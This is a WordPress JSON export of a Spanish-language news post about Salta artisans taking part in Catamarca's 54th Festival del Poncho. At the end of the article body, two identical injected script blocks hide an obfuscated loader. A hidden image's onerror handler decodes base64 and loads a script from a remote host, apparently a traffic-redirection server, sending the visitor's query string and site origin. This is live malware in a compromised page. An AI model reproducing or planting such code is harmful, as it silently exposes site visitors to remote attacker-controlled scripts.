{"id":5356,"date":"2025-07-22T23:25:21","date_gmt":"2025-07-23T02:25:21","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5356"},"modified":"2025-08-13T23:25:08","modified_gmt":"2025-08-14T02:25:08","slug":"la-artesania-saltena-presente-en-la-54a-edicion-del-festival-nacional-e-internacional-del-poncho","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5356","title":{"rendered":"La artesan\u00eda salte\u00f1a presente en la 54\u00aa edici\u00f3n del Festival Nacional e Internacional del Poncho"},"content":{"rendered":"\n<p><strong><em>Hasta el 27 de julio en el Predio Ferial de Catamarca, Salta expone al mundo su identidad, cultura y producci\u00f3n con t\u00e9cnicas ancestrales.<\/em><\/strong><\/p>\n\n\n\n<p>El Festival del Poncho se trata de la fiesta m\u00e1s grande, importante y de principal convocatoria de la provincia de Catamarca.<\/p>\n\n\n\n<p>En esta oportunidad, la provincia de Salta participa con un stand institucional a cargo de la Secretar\u00eda de Cultura en el que exponen y venden los maestros artesanos, Ram\u00f3n Guido Cutipa de Cafayate, ceramista, ganador de la categor\u00eda Artes de la Tierra en el Sal\u00f3n Provincial de Artes Visuales 2024 y Gustavo Ch\u00e1vez de la ciudad de Salta, representando al Mercado Artesanal de Salta en el metales, alpaca y plata.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/18492-la-artesania-saltenia-presente-en-la-54-edicion-del-festival-nacional-e-internacional-del-poncho.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/18492-la-artesania-saltenia-presente-en-la-54-edicion-del-festival-nacional-e-internacional-del-poncho.webp\" alt=\"La artesan\u00eda salte\u00f1a presente en la 54\u00aa edici\u00f3n del Festival Nacional e Internacional del Poncho\"\/><\/a><\/figure>\n\n\n\n<p>Esta acci\u00f3n refleja el compromiso del Gobierno de la Provincia de Salta con el sector artesanal a trav\u00e9s del \u00c1rea de Desarrollo Artesanal y el Mercado Artesanal, fomentando la comercializaci\u00f3n y la difusi\u00f3n del trabajo de los artesanos en este importante evento.<\/p>\n\n\n\n<p>A la delegaci\u00f3n salte\u00f1a se suman, los luthiers Roxana G\u00f3mez, Federico Coro y Jos\u00e9 G\u00f3mez; Gustavo Oliva del rubro piedra; los ceramistas Leonardo Guaym\u00e1s y Mar\u00eda Serrano y la Asociaci\u00f3n Civil de Artesan\u00edas San Carlos, todos artesanos del Mercado Artesanal de Salta.<\/p>\n\n\n\n<p>Acompa\u00f1aron en la apertura del evento, el secretario de Cultura de la Provincia,&nbsp;<strong>Diego Ashur<\/strong>; la directora del Mercado Artesanal de Salta,&nbsp;<strong>Yanina Lenti<\/strong>&nbsp;y el jefe del programa de Desarrollo Artesanal,&nbsp;<strong>Mario Luna<\/strong>.<\/p>\n\n\n\n<p>Los funcionarios Lenti y Luna, se sumaron a la reuni\u00f3n con directores de Mercados y referentes provinciales del \u00c1rea de Artesan\u00edas para tratar las problem\u00e1ticas comunes a la regi\u00f3n y articular acciones conjuntas.<\/p>\n\n\n\n<p>Durante diez d\u00edas, Catamarca despliega toda la tradici\u00f3n del norte argentino a trav\u00e9s de la m\u00fasica, la danza, la gastronom\u00eda y especialmente, las artesan\u00edas.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/18493-la-artesania-saltenia-presente-en-la-54-edicion-del-festival-nacional-e-internacional-del-poncho.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/18493-la-artesania-saltenia-presente-en-la-54-edicion-del-festival-nacional-e-internacional-del-poncho.webp\" alt=\"La artesan\u00eda salte\u00f1a presente en la 54\u00aa edici\u00f3n del Festival Nacional e Internacional del Poncho\"\/><\/a><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Hasta el 27 de julio en el Predio Ferial de Catamarca, Salta expone al mundo su identidad, cultura y producci\u00f3n con t\u00e9cnicas ancestrales. El Festival del Poncho se trata de la fiesta m\u00e1s grande, importante y de principal convocatoria de la provincia de Catamarca. En esta oportunidad, la provincia de Salta participa con un stand [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5357,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,13],"tags":[],"class_list":{"0":"post-5356","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5356"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5356"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5356\/revisions"}],"predecessor-version":[{"id":6434,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5356\/revisions\/6434"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5357"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5356"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5356"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5356"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}